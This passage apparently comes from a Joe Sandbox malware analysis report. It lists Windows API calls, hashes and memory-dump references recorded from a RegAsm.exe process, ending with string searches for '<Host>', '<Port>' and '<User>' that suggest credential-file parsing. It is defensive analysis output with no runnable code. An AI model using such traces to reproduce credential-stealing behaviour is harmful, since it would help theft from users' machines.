                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601DA76340322ABF7204F95EC45F57B7ADEF45B61F200426FB49EA2C0D6B5A8108BB4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,004271C4,00000000,?,00000000,00000000), ref: 0041015E
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,004271C4,00000000,?,00000000,00000000), ref: 00410165
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(004271C4,?,004271C4,00000000,?,00000000,00000000), ref: 00410171
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041019D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1243822799-0
                                                                                                                                                                                                                                                    • Opcode ID: 8f2ff721cb424942451b347fe5570341ae3898732b1430379c704d4f1e29be0c
                                                                                                                                                                                                                                                    • Instruction ID: fccc40c8ee202386385d4aa97dc71e834c2259e96c23f56b48720401643fd0a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f2ff721cb424942451b347fe5570341ae3898732b1430379c704d4f1e29be0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF09AB6900038BBD710ABDAAC099BFB7FDEF48B02F00114AFA45D2180E6784950D3B4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73B720
                                                                                                                                                                                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C73B75A
                                                                                                                                                                                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,6C720BA4,00000000,?,0000001C,?,?,00000000,?,6C718E44,?,00000000,?,6C720BA4), ref: 6C73B760
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 304294125-0
                                                                                                                                                                                                                                                    • Opcode ID: 5dd71325973ad88fe60e4eee48053d83aa0d9da33b56bb3957aed5dc87aa23d2
                                                                                                                                                                                                                                                    • Instruction ID: c5676704675a46d021c3dabf85f1165bc3d2b301df7b42eb4c2e55c60e351e56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd71325973ad88fe60e4eee48053d83aa0d9da33b56bb3957aed5dc87aa23d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0AFB0A0022CAEEF019AB1CE8CBEEB7BDDB0431AF50613AE515615C1D774A58CC660
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E03D4,?), ref: 6C73B955
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73B9A5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1889792194-0
                                                                                                                                                                                                                                                    • Opcode ID: 9d498d55df6550144d671d5c2bddaffe953b585782aa79fc211d5164e26f78f8
                                                                                                                                                                                                                                                    • Instruction ID: 2030d9035b76b60a97dc8c8c6bd7150a35d677a0f9f984cbfe068dffb4e6baac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d498d55df6550144d671d5c2bddaffe953b585782aa79fc211d5164e26f78f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41A271F0161D9BDF04CFA9D984ADEBBB6FF88314F24813AE409A7744DB30A9458B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(0041F356), ref: 0041F39D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 337adc5baee7dcba3e409034c921b94744581b00ed52da9119a04e8e66f87466
                                                                                                                                                                                                                                                    • Instruction ID: b6763dbefe703962a569a259006443cdc4209c638d5c317421f10fb9fbbbe72b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 337adc5baee7dcba3e409034c921b94744581b00ed52da9119a04e8e66f87466
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 009002B0352104C68A105B716C09545A5B05B9861379544756411C5068DB68914AB53D
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040BC80: lstrlenA.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BCCF
                                                                                                                                                                                                                                                      • Part of subcall function 0040BC80: strchr.MSVCRT ref: 0040BCE5
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630,?,75AA5460,00000000,?,?,?,?,?,?,?,00000000,00420D11,000000FF), ref: 0040BE31
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420D11,000000FF,?,0040C630,?,00000000,?), ref: 0040BE38
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00420D11,000000FF,?,0040C630,?,00000000), ref: 0040BE4D
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420D11,000000FF,?,0040C630,?,00000000,?), ref: 0040BE54
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BE71
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040BE82
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420D11), ref: 0040BE89
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEB3
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BEBA
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040BEC6
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BECD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BEE2
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BEE9
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BF1A
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF21
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BF40
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF47
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040BF53
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BF5A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BF6F
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF76
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BF99
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BFA7
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BFAE
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BFD6
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BFDD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040BFE9
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BFF0
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C005
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C00C
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C02C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C03D
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C044
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C04B
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C05D
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040C064
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C085
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C0AB
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C0C2
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C0C9
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C0D0
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C0DF
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040C0E6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C0F4
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C0FB
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C117
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C123
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C12A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C157
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C15E
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040C16A
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040C171
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C187
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C196
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C19D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C211
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C221
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2B0
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C2B7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662779188-0
                                                                                                                                                                                                                                                    • Opcode ID: b800f4712dbf29e3d961cb9670fd45effb9da492dafbde318e8ec9388cdfc4eb
                                                                                                                                                                                                                                                    • Instruction ID: 959c6f8cf0a82b0143dc722e3d37d5731d0bb7bf2315a719624b2c4923ae8926
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b800f4712dbf29e3d961cb9670fd45effb9da492dafbde318e8ec9388cdfc4eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE14476900225ABDB10EBE4DC49EEF7B7DFF45704F10552AFA02B3291DB385A048BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C70E1A5), ref: 6C735606
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C70E1A5), ref: 6C73560F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C735633
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C73563D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C73566C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C73567D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C735696
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7356B2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7356CB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7356E4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7356FD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C735716
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C73572F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C735748
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C735761
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C73577A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C735793
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7357A8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7357BD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7357D5
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7357EA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7357FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                    • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                    • Opcode ID: ced22ec9b650b6ae24c812dc4b37c73ff8d5c3ba999052d2c9e53b3123e873b0
                                                                                                                                                                                                                                                    • Instruction ID: 4c2d771c7b2bfa41d27756438a2037fdd15881f3a4ec74be16ba619f7b144625
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ced22ec9b650b6ae24c812dc4b37c73ff8d5c3ba999052d2c9e53b3123e873b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F5177707017539BEB419F36AF449763AFCAB0B245B945439ED26E2A42EF74DA00CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default), ref: 6C71CC27
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java), ref: 6C71CC3D
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C74FE98), ref: 6C71CC56
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf), ref: 6C71CC6C
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio), ref: 6C71CC82
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio), ref: 6C71CC98
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall), ref: 6C71CCAE
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C71CCC4
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C71CCDA
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C71CCEC
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C71CCFE
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C71CD14
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C71CD82
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C71CD98
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C71CDAE
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C71CDC4
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C71CDDA
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C71CDF0
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C71CE06
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C71CE1C
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C71CE32
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C71CE48
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C71CE5E
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C71CE74
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C71CE8A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strcmp
                                                                                                                                                                                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                    • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                    • Opcode ID: 9bcb29b908e99343f3d5371c11121b4a8d8eaa55197a1a88afc6558c1d48f8d4
                                                                                                                                                                                                                                                    • Instruction ID: 71f9d54ba6b30e0a6f14e590b6df5fc572ab6eb392ce604f717fdda2b3d316f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bcb29b908e99343f3d5371c11121b4a8d8eaa55197a1a88afc6558c1d48f8d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A51A9C1A5D62553FB0031956F1BBAA1409EF5324BF1C843AED8AA1E80FF05D71D86B7
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C8E6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8F1
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C928
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C933
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040C970
